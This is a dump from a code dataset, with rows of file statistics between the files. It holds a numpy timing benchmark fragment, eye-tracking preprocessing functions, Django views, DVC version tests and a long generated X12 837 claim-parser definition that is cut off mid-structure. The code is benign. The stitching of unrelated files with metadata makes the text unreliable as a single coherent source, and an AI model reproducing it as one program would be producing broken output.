min(timeit.Timer(f'arr = (np.arange({sz}) * 10 ** 6 / 2000).astype(np.int64)', setup=f'import numpy as np').repeat(10, num)) def measure_np_mult_v2(sz, num=3): return min(timeit.Timer(f'arr = (np.arange({sz}) * 500.0).astype(np.int64)', setup=f'import numpy as np').repeat(10, num)) if __name__ == "__main__": size = optimize_time_conversion.size num_per_timeit = 10 # print(measure_np_arange(size, num_per_timeit)) # print(measure_np_arange_f(size, num_per_timeit)) # print(measure_np_arange_us(size, num_per_timeit)) # print(measure_np_arange_us_f(size, num_per_timeit)) # print(measure_np_linspace(size, num_per_timeit)) # print(measure_np_linspace_f(size, num_per_timeit)) print() print(measure_np_mult_v1(size, num_per_timeit)) print(measure_np_mult_v2(size, num_per_timeit))
34.586207
135
0.696411
356
2,006
3.702247
0.123596
0.116085
0.098634
0.113809
0.831563
0.831563
0.814871
0.792109
0.705615
0.647951
0
0.038796
0.139083
2,006
57
136
35.192982
0.724378
0.148056
0
0
0
0.037037
0.288824
0.026471
0
0
0
0
0
1
0.333333
false
0
0.444444
0.333333
1.111111
0.111111
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
10
31006e374b40cc105d0c73c45dce1942093b3d11
2,292
py
Python
sonaion_analysis/eyetracking/preprocessing_invalid.py
Sonaion/py-sonaion-analysis
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
[ "BSD-3-Clause" ]
1
2021-10-15T06:58:56.000Z
2021-10-15T06:58:56.000Z
sonaion_analysis/eyetracking/preprocessing_invalid.py
Sonaion/py-sonaion-analysis
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
[ "BSD-3-Clause" ]
null
null
null
sonaion_analysis/eyetracking/preprocessing_invalid.py
Sonaion/py-sonaion-analysis
f4bcf2ff1ad88563e6b8ef5d5d0ab9a23e69ac92
[ "BSD-3-Clause" ]
null
null
null
def remove_invalid(eye_x, eye_y, pupil_diameter, eye_valid): """ A Function to remove invalid eye data, careful there is no machanism to synchronise left and right eye afterwards :param eye_x: an indexable datastructure with the x eye coordinates :param eye_y: an indexable datastructure with the y eye coordinates :param pupil_diameter: an indexable datastructure with the pupil diameter :param eye_valid: an indexable datastructure indicating if the eye is valid (1 if yes) :return a tuple (eye_x, eye_y, pupil_diameter, eye_valid) """ x = [] y = [] pupil = [] valid = [] for idx, value in enumerate(eye_valid): if value == 1: x.append(eye_x[idx]) y.append(eye_y[idx]) pupil.append(pupil_diameter[idx]) valid.append(1) return x, y, pupil, valid def replace_with_prev_invalid(eye_x, eye_y, pupil_diameter, eye_valid): """ A Function to remove invalid eye data, careful there is no machanism to synchronise left and right eye afterwards :param eye_x: an indexable datastructure with the x eye coordinates :param eye_y: an indexable datastructure with the y eye coordinates :param pupil_diameter: an indexable datastructure with the pupil diameter :param eye_valid: an indexable datastructure indicating if the eye is valid (1 if yes) :return a tuple (eye_x, eye_y, pupil_diameter, eye_valid) """ prev_x = None prev_y = None prev_pupil = None for idx, value in enumerate(eye_valid): if value == 1: prev_x = eye_x[idx] prev_y = eye_y[idx] prev_pupil = pupil_diameter[idx] break x = [] y = [] pupil = [] valid = [] for idx, value in enumerate(eye_valid): if value == 1: x.append(eye_x[idx]) y.append(eye_y[idx]) pupil.append(pupil_diameter[idx]) prev_x = eye_x[idx] prev_y = eye_y[idx] prev_pupil = pupil_diameter[idx] else: x.append(prev_x) y.append(prev_y) pupil.append(prev_pupil) valid.append(1) return x, y, pupil, valid
33.705882
117
0.608202
315
2,292
4.250794
0.149206
0.116505
0.143391
0.125467
0.917102
0.917102
0.917102
0.917102
0.872293
0.872293
0
0.004459
0.315009
2,292
67
118
34.208955
0.848408
0.447208
0
0.75
0
0
0
0
0
0
0
0
0
1
0.05
false
0
0
0
0.1
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
310953ae3e1f43870d07f4c3575d54ce975a32a9
212
py
Python
mysite/views.py
UrbanSwati/recipe24
8f69b4ef9b69c5e2f6741677820bf005be53e1c8
[ "MIT" ]
null
null
null
mysite/views.py
UrbanSwati/recipe24
8f69b4ef9b69c5e2f6741677820bf005be53e1c8
[ "MIT" ]
null
null
null
mysite/views.py
UrbanSwati/recipe24
8f69b4ef9b69c5e2f6741677820bf005be53e1c8
[ "MIT" ]
null
null
null
from django.http import HttpResponse from django.shortcuts import render def homepage(request): return render(request, 'homepage.html') def aboutpage(request): return render(request, 'aboutpage.html')
21.2
44
0.768868
26
212
6.269231
0.5
0.122699
0.233129
0.319018
0
0
0
0
0
0
0
0
0.136792
212
9
45
23.555556
0.89071
0
0
0
0
0
0.127962
0
0
0
0
0
0
1
0.333333
false
0
0.333333
0.333333
1
0
1
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
1
1
0
0
8
31cc086b3ca9eb30e1a80d070401464f99d2a5c4
119
py
Python
parchments/core/__init__.py
idlelosthobo/parchment
99cebb8bed439c04be3e7e4f6869a4e3f85f6047
[ "MIT" ]
null
null
null
parchments/core/__init__.py
idlelosthobo/parchment
99cebb8bed439c04be3e7e4f6869a4e3f85f6047
[ "MIT" ]
4
2021-02-16T15:35:39.000Z
2021-04-09T19:19:35.000Z
parchments/core/__init__.py
idlelosthobo/parchments
99cebb8bed439c04be3e7e4f6869a4e3f85f6047
[ "MIT" ]
null
null
null
from parchments.core.row import Row from parchments.core.block import Block from parchments.core.core import period_key
39.666667
43
0.857143
19
119
5.315789
0.421053
0.415842
0.534653
0
0
0
0
0
0
0
0
0
0.092437
119
3
43
39.666667
0.935185
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
31d0d7e6648c93272f9738cd9b0afb9f4408d537
1,713
py
Python
tests/func/test_version.py
kaiogu/dvc
ffa8fe5888dbbb3d37b3874562f99fd77d4bbcb7
[ "Apache-2.0" ]
3
2020-01-31T05:33:14.000Z
2021-05-20T08:19:25.000Z
tests/func/test_version.py
kaiogu/dvc
ffa8fe5888dbbb3d37b3874562f99fd77d4bbcb7
[ "Apache-2.0" ]
null
null
null
tests/func/test_version.py
kaiogu/dvc
ffa8fe5888dbbb3d37b3874562f99fd77d4bbcb7
[ "Apache-2.0" ]
null
null
null
import os import re import pytest from dvc.command.version import psutil from dvc.main import main def test_info_in_repo(tmp_dir, dvc, caplog): # Create `.dvc/cache`, that is needed to check supported link types. os.mkdir(dvc.cache.local.cache_dir) assert main(["version"]) == 0 assert re.search(r"DVC version: \d+\.\d+\.\d+", caplog.text) assert re.search(r"Python version: \d\.\d\.\d", caplog.text) assert re.search(r"Platform: .*", caplog.text) assert re.search(r"Binary: (True|False)", caplog.text) assert re.search(r"Package: .*", caplog.text) assert re.search( r"(Cache: (.*link - (not )?supported(,\s)?){3})", caplog.text ) @pytest.mark.skipif(psutil is None, reason="No psutil.") def test_fs_info_in_repo(tmp_dir, dvc, caplog): os.mkdir(dvc.cache.local.cache_dir) assert main(["version"]) == 0 assert "Filesystem type (cache directory): " in caplog.text assert "Filesystem type (workspace): " in caplog.text def test_info_outside_of_repo(tmp_dir, caplog): assert main(["version"]) == 0 assert re.search(r"DVC version: \d+\.\d+\.\d+", caplog.text) assert re.search(r"Python version: \d\.\d\.\d", caplog.text) assert re.search(r"Platform: .*", caplog.text) assert re.search(r"Binary: (True|False)", caplog.text) assert re.search(r"Package: .*", caplog.text) assert not re.search(r"(Cache: (.*link - (not )?(,\s)?){3})", caplog.text) @pytest.mark.skipif(psutil is None, reason="No psutil.") def test_fs_info_outside_of_repo(tmp_dir, caplog): assert main(["version"]) == 0 assert "Filesystem type (cache directory): " not in caplog.text assert "Filesystem type (workspace): " in caplog.text
33.588235
78
0.666667
259
1,713
4.324324
0.220077
0.142857
0.096429
0.147321
0.855357
0.855357
0.817857
0.776786
0.776786
0.726786
0
0.004178
0.161705
1,713
50
79
34.26
0.775766
0.038529
0
0.571429
0
0
0.271733
0.013374
0
0
0
0
0.571429
1
0.114286
false
0
0.142857
0
0.257143
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
7
31d88c9885f0da56a1fe32565e2d86624381320a
950,807
py
Python
tigershark/parsers/M837_5010_X222_A1.py
CloudCray/TigerShark
e27f1e775652576743518d9f2dfd57266f0c541f
[ "BSD-3-Clause" ]
19
2016-05-09T01:30:37.000Z
2022-03-15T15:51:24.000Z
tigershark/parsers/M837_5010_X222_A1.py
CloudCray/TigerShark
e27f1e775652576743518d9f2dfd57266f0c541f
[ "BSD-3-Clause" ]
10
2016-04-11T14:55:54.000Z
2021-08-07T15:41:14.000Z
tigershark/parsers/M837_5010_X222_A1.py
CloudCray/TigerShark
e27f1e775652576743518d9f2dfd57266f0c541f
[ "BSD-3-Clause" ]
11
2015-10-15T16:12:39.000Z
2021-03-22T19:33:56.000Z
# # Generated by TigerShark.tools.convertPyX12 on 2021-05-10 10:26:14.167130 # from tigershark.X12.parse import Composite, Element, Loop, Message, Properties, Segment parsed_837_1000A = Loop( "1000A", Properties( desc="Submitter Name", looptype="", position="0200", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Submitter Name", position="0200", repeat="1", req_sit="R", syntax="P0809 C1110", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["41"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["46"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "PER", Properties( desc="Submitter EDI Contact Information", position="0450", repeat="2", req_sit="R", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["ED", "EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["ED", "EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["ED", "EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_1000B = Loop( "1000B", Properties( desc="Receiver Name", looptype="", position="0200", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Receiver Name", position="0200", repeat="1", req_sit="R", syntax="P0809 C1110", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["40"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["46"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), ) parsed_837_HEADER = Loop( "HEADER", Properties( desc="Table 1 - Header", looptype="wrapper", position="0100", repeat="1", req_sit="R", ), Segment( "BHT", Properties( desc="Beginning of Hierarchical Transaction", position="0100", repeat="1", req_sit="R", syntax="", ), Element( "BHT01", Properties( desc="Hierarchical Structure Code", req_sit="R", data_type=("ID", "4", "4"), position=1, codes=["0019"], ), ), Element( "BHT02", Properties( desc="Transaction Set Purpose Code", req_sit="R", data_type=("ID", "2", "2"), position=2, codes=["00", "18"], ), ), Element( "BHT03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "BHT04", Properties( desc="Date", req_sit="R", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "BHT05", Properties( desc="Time", req_sit="R", data_type=("TM", "4", "8"), position=5, codes=[], ), ), Element( "BHT06", Properties( desc="Transaction Type Code", req_sit="R", data_type=("ID", "2", "2"), position=6, codes=["CH", "RP"], ), ), ), parsed_837_1000A, parsed_837_1000B, ) parsed_837_2010AA = Loop( "2010AA", Properties( desc="Billing Provider Name", looptype="", position="0150", repeat="1", req_sit="R", ), Segment( "NM1", Properties( desc="Billing Provider Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="S", data_type=("ID", "1", "2"), position=8, codes=["XX"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="S", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Billing Provider Address", position="0250", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Billing Provider City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Billing Provider Tax Identification", position="0350", repeat="1", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EI", "SY"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Billing Provider UPIN/License Information", position="0350", repeat="2", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["0B", "1G"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "PER", Properties( desc="Billing Provider Contact Information", position="0400", repeat="2", req_sit="S", syntax="P0304 P0506 P0708", ), Element( "PER01", Properties( desc="Contact Function Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["IC"], ), ), Element( "PER02", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=2, codes=[], ), ), Element( "PER03", Properties( desc="Communication Number Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["EM", "FX", "TE"], ), ), Element( "PER04", Properties( desc="Communication Number", req_sit="R", data_type=("AN", "1", "256"), position=4, codes=[], ), ), Element( "PER05", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=5, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER06", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=6, codes=[], ), ), Element( "PER07", Properties( desc="Communication Number Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["EM", "EX", "FX", "TE"], ), ), Element( "PER08", Properties( desc="Communication Number", req_sit="S", data_type=("AN", "1", "256"), position=8, codes=[], ), ), Element( "PER09", Properties( desc="Contact Inquiry Reference", req_sit="N", data_type=("AN", "1", "20"), position=9, codes=[], ), ), ), ) parsed_837_2010AB = Loop( "2010AB", Properties( desc="Pay-to Address Name", looptype="", position="0150", repeat="1", req_sit="S", ), Segment( "NM1", Properties( desc="Pay-to Address Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["87"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=8, codes=[], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="N", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Pay-to Address - ADDRESS", position="0250", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Pay-To Address City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), ) parsed_837_2010AC = Loop( "2010AC", Properties( desc="Pay-To Plan Name", looptype="", position="0150", repeat="1", req_sit="S" ), Segment( "NM1", Properties( desc="Pay-To Plan Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["PE"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="N", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="N", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="N", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["PI", "XV"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Pay-to Plan Address", position="0250", repeat="1", req_sit="R", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Pay-To Plan City, State, ZIP Code", position="0300", repeat="1", req_sit="R", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), Element( "N404", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "N405", Properties( desc="Location Qualifier", req_sit="N", data_type=("ID", "1", "2"), position=5, codes=[], ), ), Element( "N406", Properties( desc="Location Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "N407", Properties( desc="Country Subdivision Code", req_sit="S", data_type=("ID", "1", "3"), position=7, codes=[], ), ), ), Segment( "REF", Properties( desc="Pay-to Plan Secondary Identification", position="0350", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["2U", "FY", "NF"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Pay-To Plan Tax Identification Number", position="0350", repeat="1", req_sit="R", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EI"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), ) parsed_837_2010BA = Loop( "2010BA", Properties( desc="Subscriber Name", looptype="", position="0150", repeat="1", req_sit="R" ), Segment( "NM1", Properties( desc="Subscriber Name", position="0150", repeat="1", req_sit="R", syntax="P0809 C1110 C1203", ), Element( "NM101", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["IL"], ), ), Element( "NM102", Properties( desc="Entity Type Qualifier", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["1", "2"], ), ), Element( "NM103", Properties( desc="Name Last or Organization Name", req_sit="R", data_type=("AN", "1", "60"), position=3, codes=[], ), ), Element( "NM104", Properties( desc="Name First", req_sit="S", data_type=("AN", "1", "35"), position=4, codes=[], ), ), Element( "NM105", Properties( desc="Name Middle", req_sit="S", data_type=("AN", "1", "25"), position=5, codes=[], ), ), Element( "NM106", Properties( desc="Name Prefix", req_sit="N", data_type=("AN", "1", "10"), position=6, codes=[], ), ), Element( "NM107", Properties( desc="Name Suffix", req_sit="S", data_type=("AN", "1", "10"), position=7, codes=[], ), ), Element( "NM108", Properties( desc="Identification Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=8, codes=["II", "MI"], ), ), Element( "NM109", Properties( desc="Identification Code", req_sit="R", data_type=("AN", "2", "80"), position=9, codes=[], ), ), Element( "NM110", Properties( desc="Entity Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=10, codes=[], ), ), Element( "NM111", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=11, codes=[], ), ), Element( "NM112", Properties( desc="Name Last or Organization Name", req_sit="N", data_type=("AN", "1", "60"), position=12, codes=[], ), ), ), Segment( "N3", Properties( desc="Subscriber Address", position="0250", repeat="1", req_sit="S", syntax="", ), Element( "N301", Properties( desc="Address Information", req_sit="R", data_type=("AN", "1", "55"), position=1, codes=[], ), ), Element( "N302", Properties( desc="Address Information", req_sit="S", data_type=("AN", "1", "55"), position=2, codes=[], ), ), ), Segment( "N4", Properties( desc="Subscriber City, State, ZIP Code", position="0300", repeat="1", req_sit="S", syntax="E0207 C0605 C0704", ), Element( "N401", Properties( desc="City Name", req_sit="R", data_type=("AN", "2", "30"), position=1, codes=[], ), ), Element( "N402", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=[], ), ), Element( "N403", Properties( desc="Postal Code", req_sit="S", data_type=("ID", "3", "15"), position=3, codes=[], ), ), 